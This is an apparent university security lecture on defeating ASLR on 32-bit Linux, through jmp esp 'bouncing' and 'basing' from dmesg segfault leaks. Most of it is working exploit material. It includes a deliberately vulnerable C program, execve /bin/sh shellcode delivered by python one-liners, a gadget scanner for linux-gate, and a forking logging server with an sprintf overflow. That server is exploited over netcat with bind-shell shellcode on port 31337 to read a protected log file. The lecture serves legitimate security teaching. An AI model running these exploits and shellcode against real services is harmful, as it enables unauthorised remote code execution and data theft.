Lec. 17: Defeating ASLR by Bouncing and Basing
Table of Contents
1 Bouncing to Defeat ASLR
One thing we learned by brute forcing ASLR is that randomness may not be as random as we want it to be. However, things get worse when something is completely un-random. It doesn't help that the stack is random if some other part of the code is not random. If that non-random region happened to hold some instruction that would be useful, and it was always in that same spot, then we could use it as part of our exploit.
2 Call/Jmp esp bounce
What are we looking for exactly? Well there are two instructions that
are particularly useful: jmp esp
and call esp
. These two
instructions are super useful due to what happens right before the
return address. Consider the leave
and ret
commands, which are
equivalent to the following:
leave --> mov esp,ebp pop ebp ret --> pop eip
The leave command will deallocate the stack frame and reset ebp
to
the saved base pointer. Return will then pop the return address off
the stack and set it to the instruction pointer. The question, what
does the stack look like when that procedure finishes, and what is esp
referencing. If we look at situation where we are using an exploit like so:
.-----------. | | | v ./vulnerable 5 <--------padding-----><return-address><shell code>
Our stack would like this as we moved through the procedures
leave->mov esp,ebp ret->pop eip pop ebp ebp->| ??? | ebp->| ??? | .---------. |---------| |---------| | s c | | s c | | s c | | h o | | h o | | h o | | e d | | e d | | e d | | l e | | l e | | l e | | l | | l | esp-> | l | |---------| |---------| '---------' | ret. ad.| esp->| ret. ad.| |---------| '---------' ebp-> | sbp | |---------| | | : : . . esp-> | | '---------'
And looky there, esp
is pointing right at our shell code. So, if
knew the location of a jmp esp
or call esp
instruction, then we
can write that address as the return address and that would then
execute our shell code. This is called bouncing.
2.1 Finding a bounce point
To start, we need to what bytes constitute a jmp esp
or a call esp
.
user@si485H-base:demo$ objdump -d -M intel jmpcall_esp jmpcall_esp: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: ff e4 jmp esp 8048062: ff d4 call esp
So, in our code, we are looking for \xff\xe4
or \xff\d4
. To see
how this works, I've modified the vulnerable program we've been
working with as follows:
#include <stdio.h> #include <string.h> #include <stdlib.h> void jmpesp_embedding(){ asm("jmp *%esp");//add a jmp esp instruction here to find } void bad(){ printf("You've been naughty!\n"); } void good(){ printf("Go Navy!\n"); } void vuln(int n, char * str){ int i = 0; char buf[32]; strcpy(buf,str); while( i < n ){ printf("%d %s\n",i++, buf); } } int main(int argc, char *argv[]){ vuln(atoi(argv[1]), argv[2]); return 0; }
The function jmpesp_embedding
uses C's inline assembly embedding,
the asm()
function to put a jmp esp
instruction into the C code at
a consistent place. In particular, it will be in the text
segment,
which is not randomized. The reason is somewhat obvious when you think
about it, there are a lot of hard jmps and control flow that requires
knowing the addresses of other functions. This stuff can't be changed
willy nilly, so it can't be randomized like the stack, where
everything is relative to the stack and base pointers.
To learn the address of our bounce point, we can look at objdump
.
080484ad <jmpesp_embedding>: 80484ad: 55 push ebp 80484ae: 89 e5 mov ebp,esp 80484b0: ff e4 jmp esp 80484b2: 5d pop ebp 80484b3: c3 ret
At address 0x08048b0, we have a jmp esp
, and now to use that as our
overwrite for the return address. Below, I use the smallest shell code
(21-byte) code as before:
user@si485H-base:demo$ ./vulnerable 1 `python -c "print 'A'*(0x2c+0x4) + '\xb0\x84\x04\x08' + '\x31\xc9\xf7\xe1\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80'"` $ cat /proc/sys/kernel/randomize_va_space 2 $
And, on the first try, BAM!, and look, no NOP sled. As you can see, this is with address space randomization. This just got easy … sort of.
2.2 Bouncing off Linux Gate (Linux 2.6.X)
People have known about this vulnerability for awhile, so they try hard get rid of bounce points, but that was not always the case. Let's take a trip down memory lane to 2006 when the Linux 2.6.X kernel was kind. Ubuntu 6.06 was released (so called Dapper Drake), and for reference, we are now up to 14.04.
In the Linux 2.6.X kernels, there was a problem with address space randomization and the loading of some shared libraries. The problem, there map locations was not random. We can investigate this more by taking a trip down memory lane … I've got a Ubuntu 6.06 VM running.
We can run the same tests to check out the randomness as we did in the last lesson:
user@ubuntu-6-06:~/si485h-class-demos/class/16$ uname -a Linux ubuntu-6-06 2.6.15-26-386 #1 PREEMPT Thu Aug 3 02:52:00 UTC 2006 i686 GNU/Linux user@ubuntu-6-06:~/si485h-class-demos/class/16$ for i in `seq 1 1 100`; do ./rand_sample ; done | python random_bits.py Consitent: 10111111100000000000000000000100 0xBF800004L Changed: 11111111100000000000000000001111 19
And we do see that the yes, in fact there is randomization going on, but it is not quite as it seems. Let's look what happens when we look at the maps:
user@ubuntu-6-06:~/si485h-class-demos/class/16$ ./busy_wait & [2] 10252 user@ubuntu-6-06:~/si485h-class-demos/class/16$ cat /proc/10252/maps 08048000-08049000 r-xp 00000000 08:01 614242 /home/user/si485h-class-demos/class/16/busy_wait 08049000-0804a000 rwxp 00000000 08:01 614242 /home/user/si485h-class-demos/class/16/busy_wait b7e36000-b7e37000 rwxp b7e36000 00:00 0 b7e37000-b7f5c000 r-xp 00000000 08:01 597932 /lib/tls/i686/cmov/libc-2.3.6.so b7f5c000-b7f61000 r-xp 00125000 08:01 597932 /lib/tls/i686/cmov/libc-2.3.6.so b7f61000-b7f64000 rwxp 0012a000 08:01 597932 /lib/tls/i686/cmov/libc-2.3.6.so b7f64000-b7f66000 rwxp b7f64000 00:00 0 b7f70000-b7f72000 rwxp b7f70000 00:00 0 b7f72000-b7f87000 r-xp 00000000 08:01 566182 /lib/ld-2.3.6.so b7f87000-b7f89000 rwxp 00014000 08:01 566182 /lib/ld-2.3.6.so bfd71000-bfd87000 rwxp bfd71000 00:00 0 [stack] ffffe000-fffff000 ---p 00000000 00:00 0 [vdso] user@ubuntu-6-06:~/si485h-class-demos/class/16$ killall busy_wait user@ubuntu-6-06:~/si485h-class-demos/class/16$ ./busy_wait & [3] 10276 [2] Terminated ./busy_wait user@ubuntu-6-06:~/si485h-class-demos/class/16$ cat /proc/10276/maps 08048000-08049000 r-xp 00000000 08:01 614242 /home/user/si485h-class-demos/class/16/busy_wait 08049000-0804a000 rwxp 00000000 08:01 614242 /home/user/si485h-class-demos/class/16/busy_wait b7e3e000-b7e3f000 rwxp b7e3e000 00:00 0 b7e3f000-b7f64000 r-xp 00000000 08:01 597932 /lib/tls/i686/cmov/libc-2.3.6.so b7f64000-b7f69000 r-xp 00125000 08:01 597932 /lib/tls/i686/cmov/libc-2.3.6.so b7f69000-b7f6c000 rwxp 0012a000 08:01 597932 /lib/tls/i686/cmov/libc-2.3.6.so b7f6c000-b7f6e000 rwxp b7f6c000 00:00 0 b7f78000-b7f7a000 rwxp b7f78000 00:00 0 b7f7a000-b7f8f000 r-xp 00000000 08:01 566182 /lib/ld-2.3.6.so b7f8f000-b7f91000 rwxp 00014000 08:01 566182 /lib/ld-2.3.6.so bfc79000-bfc8f000 rwxp bfc79000 00:00 0 [stack] ffffe000-fffff000 ---p 00000000 00:00 0 [vdso]
You'll notice that some thigns move around, but the [vdso]
does
not. What is that? Well that is the linux kernel entry points for
system calls, the so called linux kernel gateway. Using the ldd
tool, we can see this more so:
user@ubuntu-6-06:~/si485h-class-demos/class/16$ ldd busy_wait linux-gate.so.1 => (0xffffe000) libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e20000) /lib/ld-linux.so.2 (0xb7f5b000)
What's in this non-randomized location? Well, let's see if it at least has what we need, and we can search it using a very simple C program:
#include <stdio.h> #include <stdlib.h> int main(){ unsigned long linuxgate_start=0xffffe000; char *ptr = (char *) linuxgate_start; int i; for(i=0;i<4096 /*one page*/; i++){ if ( ptr[i] == '\xff' && ptr[i+1] == '\xe4'){ printf("Found jmp esp at %p\n", ptr+i); } } return 0; }
user@ubuntu-6-06:~/si485h-class-demos/class/17$ ./search_gate Found jmp esp at 0xffffe777
So we can now use that address as our bounce point to exploit the vulnerable program. Here's that vulnerable program being exploited, agian.
user@ubuntu-6-06:~/si485h-class-demos/class/17$ ./vulnerable 1 `python -c "print 'A'*(0x20+0x8) + '\x77\xe7\xff\xff' + '\x31\xc9\xf7\xe1\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80'"` To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. user@ubuntu-6-06:/home/user/si485h-class-demos/class/17$ exit #<--- here I'm in the shell exit user@ubuntu-6-06:~/si485h-class-demos/class/17$
3 Basing from dmesg
Another strategy for circumventing ASLR is called basing, where
through some side channel, you learn the offset or the base address of
the loaded page, which will reveal where to jump. This can be done
remotely, or locally, and here we'll focus on using dmesg
to reveal
the base of the map and our jump point.
3.1 dmesg
dmesg
is the kernel logging functionality that is availble to the
user. It reports things like network setup and tear down, and also
information about segementation faults. Which we will use today.
For example, let's consider segfaulting (on purpose) our vulnerable program:
user@si485H-base:demo$ ./vulnerable 1 `python -c "print 'A'*100"` Segmentation fault (core dumped) user@si485H-base:demo$ dmesg | tail -1 [2876532.997490] vulnerable[23836]: segfault at 41414141 ip 41414141 sp bf973950 error 14
The program crashed, this was reported by the operating system and
logged in dmesg
. Looking more closely, the reason it crashed is
that the instruction pointer has a bunch of A's overwritten it.
More importantly, we can see that the stack pointer is also revealed, and with the base address we need, 0xbf90000!
3.2 On fork() and memory space
Another item we can leverage is that fork()
'ed process share the
same memory space as there parent. For example, here is a sample program:
#include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(){ int a =10; if ( fork() == 0){ //child printf("Child: %p\n",&a); }else{ printf("Parent: %p\n",&a); } wait(NULL); return; }
user@si485H-base:demo$ ./fork_rand_sample Parent: 0xbf9ced9c Child: 0xbf9ced9c
Why is this important? Well,many logging and backend systems must work asynchronously, so foreach request, they fork and have a child complete the tasks. If we can get the child to crash, there would be a log message in dmesg, but the parent would persist. That's exactly what we need to attack the parent process.
3.3 Basing a logging engine
Below is a sample logging utility that uses a socket to accept new messages:
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> const char logfile[]="log.dat"; void handle_client(int sock); void hello(int sock); void logmsg(int sock, char * msg); char * getmsg(int sock); void hello(int sock){ struct sockaddr_in client_addr; socklen_t sin_size ; char hello[100]; getpeername(sock, (struct sockaddr *) &client_addr, &sin_size); sprintf(hello,"Hello %s: Send log message\n", inet_ntoa(client_addr.sin_addr)); printf("%s",hello); write(sock,hello,strlen(hello)); } char * getmsg(int sock){ int size=20; char * response = malloc(size); char buf[10]; int n=0,i=0; //read a log msg reallocate as needed while( (n = read(sock,buf,10)) > 0){ if (i+n > size){ size*=2; //double size response = realloc(response, size); } strncpy(&response[i],buf,n);//write into response i+=n; //move foreard the counter } response[i]='\0' ; //null terminate return response; } void logmsg(int sock, char * msg){ char event[50]; //create event string sprintf(event,"[%d] %s\n", time(NULL), msg); //open the logfile FILE * fstream = fopen(logfile,"a"); //log the event fprintf(fstream,event); //close the file fclose(fstream); //write repsonse to client write(sock,event,strlen(event)); return; } void handle_client(int sock){ //do hello printf("Handle Client!\n"); hello(sock); //get msg char * msg = getmsg(sock); //log response logmsg(sock,msg); //deallocate free(msg); char goodbye[]="Goodbye!\n"; write(sock, goodbye,strlen(goodbye)); shutdown(sock,2); close(sock); } int main(void){ int server, client; //server and client socket struct sockaddr_in host_addr; //address structures int yes=1,gonavy=1; //open new socket for server server = socket(AF_INET, SOCK_STREAM, 0); //set up server address memset(&(host_addr), '\0', sizeof(struct sockaddr_in)); host_addr.sin_family=AF_INET; host_addr.sin_port=htons(2525); host_addr.sin_addr.s_addr=INADDR_ANY; //bind server socket if(bind(server, (struct sockaddr *) &host_addr, sizeof(struct sockaddr)) < 0){ perror("bind"); return 1; } //set up listening queue listen(server,4); //accept incoming connection while (1){ client = accept(server, NULL,NULL); if( client < 0 ){ perror("accept"); break; } if( fork() == 0){ //handle each client in the child handle_client(client); } } return 0; }
The gist of the program is that the server waits for new incoming
connections, and for each client, forks a new logging util that
will open the log file and deposit the message. Looking closely, we
see that logmsg()
function has a vulnerability when calling
sprintf()
. the Length of the msg is never checked with respect to
the length of the event
buffer.
Consider how this tool might be used on a host machine. The logging server has access to the log file that the client cannot read. However, the server allows a client to write to the file. The goal of the nefarious client is to gain access to the log fiel, essentially, to gain the privilege level of the server.
Let's consider how to do this, by first starting the server in one terminal and probing it in another, when we connect we see the following:
user@si485H-base:demo$ netcat localhost 2525 Hello 0.5.119.183: Send log message loging [1445621763] loging Goodbye!
Let's start sending it a bit more stuff …
user@si485H-base:demo$ python -c "print 'A'*50" | netcat localhost 2525 Hello 0.5.119.183: Send log message [1445621810] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAA ^C
That seemed to cause a problem, so lets check the dmesg output:
user@si485H-base:demo$ dmesg | tail -1 [2877400.157327] logger[23967]: segfault at a0a35 ip 08048af3 sp bfe11eb0 error 4 in logger[8048000+1000]
There you go, we see that we caused a segfault. Notice the ip is still mostly intact, so let's increase the length of our string until we see 0xdeadbeef for the ip.
user@si485H-base:demo$ python -c "print 'A'*50 + '\xef\xbe\xad\xde'" | netcat localhost 2525 Hello 0.5.119.183: Send log message [1445621998] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAᆳ? ^C user@si485H-base:demo$ dmesg | tail -1 [2877588.654685] logger[24018]: segfault at a0ade ip 000a0ade sp bfe11eb0 error 14 in logger[8048000+1000] user@si485H-base:demo$ python -c "print 'A'*51 + '\xef\xbe\xad\xde'" | netcat localhost 2525 Hello 0.0.0.0: Send log message ^C^C user@si485H-base:demo$ dmesg | tail -1 [2877595.667371] logger[24024]: segfault at a0adead ip 0a0adead sp bfe11eb0 error 14 user@si485H-base:demo$ python -c "print 'A'*52 + '\xef\xbe\xad\xde'" | netcat localhost 2525 Hello 0.5.119.183: Send log message ^C user@si485H-base:demo$ dmesg | tail -1 [2877604.881940] logger[24030]: segfault at adeadbe ip 0adeadbe sp bfe11eb0 error 14 user@si485H-base:demo$ python -c "print 'A'*53 + '\xef\xbe\xad\xde'" | netcat localhost 2525 Hello 0.5.119.183: Send log message ^C user@si485H-base:demo$ dmesg | tail -1 [2877612.426441] logger[24036]: segfault at deadbeef ip deadbeef sp bfe11eb0 error 15
Now we are at the instruction pointer, and also notice that the stack pointer has been consistent the whole time. Now all we need to do is add in some shell code, perhaps our remote shell code would do. But where do we set the return address, well to whereever we crashd on the stack! The address, 0xbfe11eb0:
user@si485H-base:demo$ printf `./hexify.sh assembly_rsh` > shellcode user@si485H-base:demo$ python -c "print 'A'*53 + '\xb0\x1e\xe1\xbf'+open('shellcode').read().strip()" | netcat localhost 2525 Hello 0.5.119.183: Send log message ^C
It looks like it might have not worked, but if you look at the dmesg output, you see there is no new segfault:
user@si485H-base:demo$ dmesg | tail -1 [2877708.087115] logger[24055]: segfault at deadbeef ip deadbeef sp bfe11eb0 error 15
So lets try connecting to our remote shell:
user@si485H-base:demo$ netcat localhost 31337 ls log.dat log.dat cat log.dat [1445621763] loging [1445621810] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAA [1445621927] [1445621931] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAᆳ? [1445621939] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAᆳ? [1445621947] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAAAAAᆳ? [1445621957] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAAAᆳ? [1445621967] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAᆳ? [1445621979] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAAAᆳ? [1445621988] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAAᆳ? [1445621998] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAᆳ? [1445622005] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAᆳ? [1445622014] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAᆳ? [1445622022] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAᆳ? [1445622117] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?AAAAAAAAAAAAᆳ?1?Pjj??1?C?f̀??1?Pfhzifj??jQV1۳??f̀1ɱQV??1۳1??f̀1?QQV??1۳1??f̀?Ɖ?1?1???̀A1???̀A1???̀1???Qh//shh/bin?? ̀ [1445622202] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?AAAAAAAAAAAA??1?Pjj??1?C?f̀??1?Pfhzifj??jQV1۳??f̀1ɱQV??1۳1??f̀1?QQV??1۳1??f̀?Ɖ?1?1???̀A1???̀A1???̀1???Qh//shh/bin?? ̀
BOOM! We got a remote shell and access to the log file and address space randomization was not a problem because we learned the base.